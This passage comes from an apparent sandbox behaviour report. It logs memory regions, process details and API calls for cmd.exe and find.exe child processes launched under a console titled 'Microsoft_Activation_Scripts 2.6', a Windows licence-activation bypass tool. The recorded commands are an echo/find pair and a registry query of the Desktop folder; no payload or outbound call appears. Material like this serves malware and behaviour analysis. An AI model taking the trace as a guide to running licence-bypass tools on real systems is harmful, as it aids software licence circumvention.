"private_0x0000024bd5460000" filename = "" Region: id = 1457 start_va = 0x24bd5480000 end_va = 0x24bd5494fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000024bd5480000" filename = "" Region: id = 1458 start_va = 0x24bd54a0000 end_va = 0x24bd54a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000024bd54a0000" filename = "" Region: id = 1459 start_va = 0x24bd54b0000 end_va = 0x24bd54b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000024bd54b0000" filename = "" Region: id = 1460 start_va = 0x24bd54c0000 end_va = 0x24bd54c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000024bd54c0000" filename = "" Region: id = 1461 start_va = 0x7df5ff380000 end_va = 0x7ff5ff37ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff380000" filename = "" Region: id = 1462 start_va = 0x7ff6240c0000 end_va = 0x7ff6240e2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6240c0000" filename = "" Region: id = 1463 start_va = 0x7ff6242d0000 end_va = 0x7ff6242d8fff monitored = 0 entry_point = 0x7ff6242d2380 region_type = mapped_file name = "find.exe" filename = "\\Windows\\System32\\find.exe" (normalized: "c:\\windows\\system32\\find.exe") Region: id = 1464 start_va = 0x7ffbed960000 end_va = 0x7ffbedb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1470 start_va = 0x24bd54d0000 end_va = 0x24bd56fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000024bd54d0000" filename = "" Region: id = 1471 start_va = 0x7ffbed570000 end_va = 0x7ffbed61cfff monitored = 0 entry_point = 0x7ffbed5881a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1472 start_va = 0x7ffbea3c0000 end_va = 0x7ffbea5a7fff monitored = 0 entry_point = 0x7ffbea3eba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1473 start_va = 0x24bd5460000 end_va = 0x24bd546ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000024bd5460000" filename = "" Region: id = 1474 start_va = 0x7ff623fc0000 end_va = 0x7ff6240bffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff623fc0000" filename = "" Region: id = 1481 start_va = 0x24bd54d0000 end_va = 0x24bd558dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1482 start_va = 0x24bd5600000 end_va = 0x24bd56fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000024bd5600000" filename = "" Region: id = 1483 start_va = 0x7ffbed880000 end_va = 0x7ffbed91cfff monitored = 0 entry_point = 0x7ffbed8878a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1484 start_va = 0x8de0960000 end_va = 0x8de09dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000008de0960000" filename = "" Region: id = 1485 start_va = 0x7ffbe1690000 end_va = 0x7ffbe16c1fff monitored = 0 entry_point = 0x7ffbe169d480 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 1486 start_va = 0x24bd5700000 end_va = 0x24bd579ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000024bd5700000" filename = "" Region: id = 1487 start_va = 0x24bd5470000 end_va = 0x24bd5476fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000024bd5470000" filename = "" Region: id = 1488 start_va = 0x24bd5590000 end_va = 0x24bd5596fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000024bd5590000" filename = "" Region: id = 1490 start_va = 0x7ffbe3470000 end_va = 0x7ffbe347dfff monitored = 0 entry_point = 0x7ffbe34745b0 region_type = mapped_file name = "fsutilext.dll" filename = "\\Windows\\System32\\fsutilext.dll" (normalized: "c:\\windows\\system32\\fsutilext.dll") Region: id = 1491 start_va = 0x24bd57a0000 end_va = 0x24bd5ad6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1492 start_va = 0x24bd55a0000 end_va = 0x24bd55e2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ulib.dll.mui" filename = "\\Windows\\System32\\en-US\\ulib.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\ulib.dll.mui") Thread: id = 78 os_tid = 0xe50 Thread: id = 80 os_tid = 0xe70 Process: id = "23" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x6eb70000" os_pid = "0xe74" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x9e4" cmd_line = "C:\\Windows\\system32\\cmd.exe /S /D /c\" echo \"127.69.2.6\" \"" cur_dir = "C:\\Windows\\System32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ff75" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1493 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1494 start_va = 0x386420000 end_va = 0x38651ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000386420000" filename = "" Region: id = 1495 start_va = 0x386600000 end_va = 0x3867fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000386600000" filename = "" Region: id = 1496 start_va = 0x10fe24b0000 end_va = 0x10fe24cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000010fe24b0000" filename = "" Region: id = 1497 start_va = 0x10fe24d0000 end_va = 0x10fe24e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000010fe24d0000" filename = "" Region: id = 1498 start_va = 0x10fe24f0000 end_va = 0x10fe24f3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000010fe24f0000" filename = "" Region: id = 1499 start_va = 0x10fe2500000 end_va = 0x10fe2500fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000010fe2500000" filename = "" Region: id = 1500 start_va = 0x10fe2510000 end_va = 0x10fe2511fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000010fe2510000" filename = "" Region: id = 1501 start_va = 0x7df5ff0f0000 end_va = 0x7ff5ff0effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff0f0000" filename = "" Region: id = 1502 start_va = 0x7ff7bcbb0000 end_va = 0x7ff7bcbd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7bcbb0000" filename = "" Region: id = 1503 start_va = 0x7ff7bd6f0000 end_va = 0x7ff7bd749fff monitored = 1 entry_point = 0x7ff7bd7053f0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 1504 start_va = 0x7ffbed960000 end_va = 0x7ffbedb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1517 start_va = 0x10fe2520000 end_va = 0x10fe26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000010fe2520000" filename = "" Region: id = 1518 start_va = 0x7ffbed570000 end_va = 0x7ffbed61cfff monitored = 0 entry_point = 0x7ffbed5881a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1519 start_va = 0x7ffbea3c0000 end_va = 0x7ffbea5a7fff monitored = 0 entry_point = 0x7ffbea3eba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1520 start_va = 0x10fe24b0000 end_va = 0x10fe24bffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000010fe24b0000" filename = "" Region: id = 1521 start_va = 0x7ff7bcab0000 end_va = 0x7ff7bcbaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7bcab0000" filename = "" Region: id = 1527 start_va = 0x10fe2520000 end_va = 0x10fe25ddfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1528 start_va = 0x10fe25e0000 end_va = 0x10fe26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000010fe25e0000" filename = "" Region: id = 1529 start_va = 0x7ffbed880000 end_va = 0x7ffbed91cfff monitored = 0 entry_point = 0x7ffbed8878a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1530 start_va = 0x386800000 end_va = 0x3868fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000386800000" filename = "" Region: id = 1531 start_va = 0x10fe26e0000 end_va = 0x10fe28bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000010fe26e0000" filename = "" Region: id = 1532 start_va = 0x10fe24c0000 end_va = 0x10fe24c6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000010fe24c0000" filename = "" Region: id = 1541 start_va = 0x10fe26e0000 end_va = 0x10fe26e6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000010fe26e0000" filename = "" Region: id = 1542 start_va = 0x10fe28b0000 end_va = 0x10fe28bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000010fe28b0000" filename = "" Thread: id = 81 os_tid = 0x668 [0179.287] GetProcAddress (hModule=0x7ffbed570000, lpProcName="SetConsoleInputExeNameW") returned 0x7ffbea416e50 [0179.287] GetProcessHeap () returned 0x10fe25e0000 [0179.287] RtlAllocateHeap (HeapHandle=0x10fe25e0000, Flags=0x8, Size=0x4012) returned 0x10fe25ec230 [0179.287] GetProcessHeap () returned 0x10fe25e0000 [0179.288] RtlFreeHeap (HeapHandle=0x10fe25e0000, Flags=0x0, BaseAddress=0x10fe25ec230) returned 1 [0179.289] _wcsicmp (_String1="echo", _String2=")") returned 60 [0179.289] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0179.289] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0179.289] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0179.289] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0179.289] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0179.289] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0179.289] GetProcessHeap () returned 0x10fe25e0000 [0179.289] RtlAllocateHeap (HeapHandle=0x10fe25e0000, Flags=0x8, Size=0xb0) returned 0x10fe25e69d0 [0179.289] GetProcessHeap () returned 0x10fe25e0000 [0179.289] RtlAllocateHeap (HeapHandle=0x10fe25e0000, Flags=0x8, Size=0x1a) returned 0x10fe25e8d60 [0179.290] GetProcessHeap () returned 0x10fe25e0000 [0179.290] RtlAllocateHeap (HeapHandle=0x10fe25e0000, Flags=0x8, Size=0x2e) returned 0x10fe25eaae0 [0179.291] GetConsoleTitleW (in: lpConsoleTitle=0x38651f670, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0179.298] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0179.298] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0179.298] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0179.298] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0179.299] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0179.299] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0179.299] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0179.299] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0179.299] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0179.299] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0179.299] GetProcessHeap () returned 0x10fe25e0000 [0179.299] RtlAllocateHeap (HeapHandle=0x10fe25e0000, Flags=0x8, Size=0x4c) returned 0x10fe25e6a90 [0179.299] GetProcessHeap () returned 0x10fe25e0000 [0179.299] RtlReAllocateHeap (Heap=0x10fe25e0000, Flags=0x0, Ptr=0x10fe25e6a90, Size=0x2c) returned 0x10fe25e6a90 [0179.299] GetProcessHeap () returned 0x10fe25e0000 [0179.299] RtlSizeHeap (HeapHandle=0x10fe25e0000, Flags=0x0, MemoryPointer=0x10fe25e6a90) returned 0x2c [0179.301] GetProcessHeap () returned 0x10fe25e0000 [0179.301] RtlAllocateHeap (HeapHandle=0x10fe25e0000, Flags=0x8, Size=0x38) returned 0x10fe25eb060 [0179.301] _vsnwprintf (in: _Buffer=0x7ff7bd731b60, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x38651f408 | out: _Buffer="\"127.69.2.6\" \r\n") returned 15 [0179.301] _get_osfhandle (_FileHandle=1) returned 0x24 [0179.301] GetFileType (hFile=0x24) returned 0x3 [0179.302] _get_osfhandle (_FileHandle=1) returned 0x24 [0179.302] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\"127.69.2.6\" \r\n", cchWideChar=-1, lpMultiByteStr=0x7ff7bd735b80, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\"127.69.2.6\" \r\n", lpUsedDefaultChar=0x0) returned 16 [0179.302] WriteFile (in: hFile=0x24, lpBuffer=0x7ff7bd735b80*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x38651f3c8, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesWritten=0x38651f3c8*=0xf, lpOverlapped=0x0) returned 1 [0179.302] _get_osfhandle (_FileHandle=1) returned 0x24 [0179.302] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x0) returned 0 [0179.302] _get_osfhandle (_FileHandle=1) returned 0x24 [0179.302] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 0 [0179.302] _get_osfhandle (_FileHandle=0) returned 0x20 [0179.302] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0179.304] SetConsoleInputExeNameW () returned 0x1 [0179.304] GetConsoleOutputCP () returned 0x1b5 [0179.309] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0179.309] SetThreadUILanguage (LangId=0x0) returned 0x409 [0179.310] exit (_Code=0) Thread: id = 83 os_tid = 0xea0 Process: id = "24" image_name = "find.exe" filename = "c:\\windows\\system32\\find.exe" page_root = "0x2d579000" os_pid = "0xe88" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x9e4" cmd_line = "find \"127.69.2.6\" " cur_dir = "C:\\Windows\\System32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ff75" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1505 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1506 start_va = 0x9803d60000 end_va = 0x9803ddffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000009803d60000" filename = "" Region: id = 1507 start_va = 0x9803e00000 end_va = 0x9803ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000009803e00000" filename = "" Region: id = 1508 start_va = 0x247be2b0000 end_va = 0x247be2cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000247be2b0000" filename = "" Region: id = 1509 start_va = 0x247be2d0000 end_va = 0x247be2e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000247be2d0000" filename = "" Region: id = 1510 start_va = 0x247be2f0000 end_va = 0x247be2f3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000247be2f0000" filename = "" Region: id = 1511 start_va = 0x247be300000 end_va = 0x247be300fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000247be300000" filename = "" Region: id = 1512 start_va = 0x247be310000 end_va = 0x247be311fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000247be310000" filename = "" Region: id = 1513 start_va = 0x7df5fffa0000 end_va = 0x7ff5fff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffa0000" filename = "" Region: id = 1514 start_va = 0x7ff623af0000 end_va = 0x7ff623b12fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff623af0000" filename = "" Region: id = 1515 start_va = 0x7ff6242d0000 end_va = 0x7ff6242d8fff monitored = 0 entry_point = 0x7ff6242d2380 region_type = mapped_file name = "find.exe" filename = "\\Windows\\System32\\find.exe" (normalized: "c:\\windows\\system32\\find.exe") Region: id = 1516 start_va = 0x7ffbed960000 end_va = 0x7ffbedb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1522 start_va = 0x247be320000 end_va = 0x247be51ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000247be320000" filename = "" Region: id = 1523 start_va = 0x7ffbed570000 end_va = 0x7ffbed61cfff monitored = 0 entry_point = 0x7ffbed5881a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1524 start_va = 0x7ffbea3c0000 end_va = 0x7ffbea5a7fff monitored = 0 entry_point = 0x7ffbea3eba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1525 start_va = 0x247be2b0000 end_va = 0x247be2bffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000247be2b0000" filename = "" Region: id = 1526 start_va = 0x7ff6239f0000 end_va = 0x7ff623aeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6239f0000" filename = "" Region: id = 1533 start_va = 0x247be320000 end_va = 0x247be3ddfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1534 start_va = 0x247be420000 end_va = 0x247be51ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000247be420000" filename = "" Region: id = 1535 start_va = 0x7ffbed880000 end_va = 0x7ffbed91cfff monitored = 0 entry_point = 0x7ffbed8878a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1536 start_va = 0x9804000000 end_va = 0x980407ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000009804000000" filename = "" Region: id = 1537 start_va = 0x7ffbe1690000 end_va = 0x7ffbe16c1fff monitored = 0 entry_point = 0x7ffbe169d480 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 1538 start_va = 0x247be520000 end_va = 0x247be5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000247be520000" filename = "" Region: id = 1539 start_va = 0x247be2c0000 end_va = 0x247be2c6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000247be2c0000" filename = "" Region: id = 1540 start_va = 0x247be3e0000 end_va = 0x247be3e6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000247be3e0000" filename = "" Region: id = 1543 start_va = 0x7ffbe3470000 end_va = 0x7ffbe347dfff monitored = 0 entry_point = 0x7ffbe34745b0 region_type = mapped_file name = "fsutilext.dll" filename = "\\Windows\\System32\\fsutilext.dll" (normalized: "c:\\windows\\system32\\fsutilext.dll") Region: id = 1544 start_va = 0x247be5e0000 end_va = 0x247be916fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1545 start_va = 0x247be520000 end_va = 0x247be562fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ulib.dll.mui" filename = "\\Windows\\System32\\en-US\\ulib.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\ulib.dll.mui") Region: id = 1546 start_va = 0x247be5d0000 end_va = 0x247be5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000247be5d0000" filename = "" Thread: id = 82 os_tid = 0xe8c Thread: id = 84 os_tid = 0xea4 Process: id = "25" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x50420000" os_pid = "0xeb8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x9e4" cmd_line = "C:\\Windows\\system32\\cmd.exe /c reg query \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\" /v Desktop" cur_dir = "C:\\Windows\\System32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ff75" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1547 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1548 start_va = 0x87a6260000 end_va = 0x87a635ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000087a6260000" filename = "" Region: id = 1549 start_va = 0x87a6400000 end_va = 0x87a65fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000087a6400000" filename = "" Region: id = 1550 start_va = 0x2303ea40000 end_va = 0x2303ea5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002303ea40000" filename = "" Region: id = 1551 start_va = 0x2303ea60000 end_va = 0x2303ea74fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000002303ea60000" filename = "" Region: id = 1552 start_va = 0x2303ea80000 end_va = 0x2303ea83fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000002303ea80000" filename = "" Region: id = 1553 start_va = 0x2303ea90000 end_va = 0x2303ea90fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000002303ea90000" filename = "" Region: id = 1554 start_va = 0x2303eaa0000 end_va = 0x2303eaa1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002303eaa0000" filename = "" Region: id = 1555 start_va = 0x7df5ff080000 end_va = 0x7ff5ff07ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff080000" filename = "" Region: id = 1556 start_va = 0x7ff7bcb80000 end_va = 0x7ff7bcba2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7bcb80000" filename = "" Region: id = 1557 start_va = 0x7ff7bd6f0000 end_va = 0x7ff7bd749fff monitored = 1 entry_point = 0x7ff7bd7053f0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 1558 start_va = 0x7ffbed960000 end_va = 0x7ffbedb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1559 start_va = 0x2303eab0000 end_va = 0x2303ed2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002303eab0000" filename = "" Region: id = 1560 start_va = 0x7ffbed570000 end_va = 0x7ffbed61cfff monitored = 0 entry_point = 0x7ffbed5881a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1561 start_va = 0x7ffbea3c0000 end_va = 0x7ffbea5a7fff monitored = 0 entry_point = 0x7ffbea3eba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1562 start_va = 0x2303ea40000 end_va = 0x2303ea4ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000002303ea40000" filename = "" Region: id = 1563 start_va = 0x7ff7bca80000 end_va = 0x7ff7bcb7ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7bca80000" filename = "" Region: id = 1564 start_va = 0x2303eab0000 end_va = 0x2303eb6dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1565 start_va = 0x2303ec30000 end_va = 0x2303ed2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002303ec30000" filename = "" Region: id = 1566 start_va = 0x7ffbed880000 end_va = 0x7ffbed91cfff monitored = 0 entry_point = 0x7ffbed8878a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1567 start_va = 0x87a6600000 end_va = 0x87a66fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000087a6600000" filename = "" Region: id = 1568 start_va = 0x2303ed30000 end_va = 0x2303eecffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002303ed30000" filename = "" Region: id = 1569 start_va = 0x2303ea50000 end_va = 0x2303ea56fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002303ea50000" filename = "" Region: id = 1570 start_va = 0x2303eb70000 end_va = 0x2303eb76fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002303eb70000" filename = "" Region: id = 1571 start_va = 0x2303eed0000 end_va = 0x2303f206fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 85 os_tid = 0xecc [0179.788] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff7bd6f0000 [0179.788] __set_app_type (_Type=0x1) [0179.788] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff7bd705700) returned 0x0 [0179.788] __getmainargs (in: _Argc=0x7ff7bd720108, _Argv=0x7ff7bd720110, _Env=0x7ff7bd720118, _DoWildCard=0, _StartInfo=0x7ff7bd720124 | out: _Argc=0x7ff7bd720108, _Argv=0x7ff7bd720110, _Env=0x7ff7bd720118) returned 0 [0179.789] GetCurrentThreadId () returned 0xecc [0179.789] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xecc) returned 0x6c [0179.789] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x7ffbed570000 [0179.789] GetProcAddress (hModule=0x7ffbed570000, lpProcName="SetThreadUILanguage") returned 0x7ffbed593270 [0179.789] SetThreadUILanguage (LangId=0x0) 